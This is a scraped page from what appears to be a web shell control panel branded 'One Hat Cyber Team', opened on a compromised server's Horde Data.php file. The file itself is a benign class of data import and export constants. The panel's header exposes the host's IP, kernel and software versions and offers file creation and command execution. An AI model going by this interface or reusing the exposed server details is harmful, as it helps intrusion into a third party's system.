⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-pear
/
pear
/
php
/
Horde
/
Edit File: Data.php
<?php /** * Copyright 1999-2017 Horde LLC (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you * did not receive this file, see http://www.horde.org/licenses/lgpl21. * * @author Jan Schneider <jan@horde.org> * @author Chuck Hagenbuch <chuck@horde.org> * @category Horde * @license http://www.horde.org/licenses/lgpl21 LGPL * @package Data */ /** * Abstract class to handle different kinds of Data formats and to * help data exchange between Horde applications and external sources. * * @author Jan Schneider <jan@horde.org> * @author Chuck Hagenbuch <chuck@horde.org> * @category Horde * @copyright 1999-2017 Horde LLC * @license http://www.horde.org/licenses/lgpl21 LGPL * @package Data */ class Horde_Data { /** * Import already mapped csv data. */ const IMPORT_MAPPED = 1; /** * Map date and time entries of csv data. */ const IMPORT_DATETIME = 2; /** * Import generic CSV data. */ const IMPORT_CSV = 3; /** * Import MS Outlook data. */ const IMPORT_OUTLOOK = 4; /** * Import vCalendar/iCalendar data. */ const IMPORT_ICALENDAR = 5; /** * Import vCards. */ const IMPORT_VCARD = 6; /** * Import generic tsv data. */ const IMPORT_TSV = 7; /** * Import Mulberry address book data. */ const IMPORT_MULBERRY = 8; /** * Import Pine address book data. */ const IMPORT_PINE = 9; /** * Import file. */ const IMPORT_FILE = 11; /** * Import data. */ const IMPORT_DATA = 12; /** * Import URL. * * @since Horde_Data 2.1.0 */ const IMPORT_URL = 13; /** * Export generic CSV data. */ const EXPORT_CSV = 100; /** * Export iCalendar data. */ const EXPORT_ICALENDAR = 101; /** * Export vCards. */ const EXPORT_VCARD = 102; /** * Export TSV data. */ const EXPORT_TSV = 103; /** * Export Outlook CSV data. */ const EXPORT_OUTLOOKCSV = 104; }
Simpan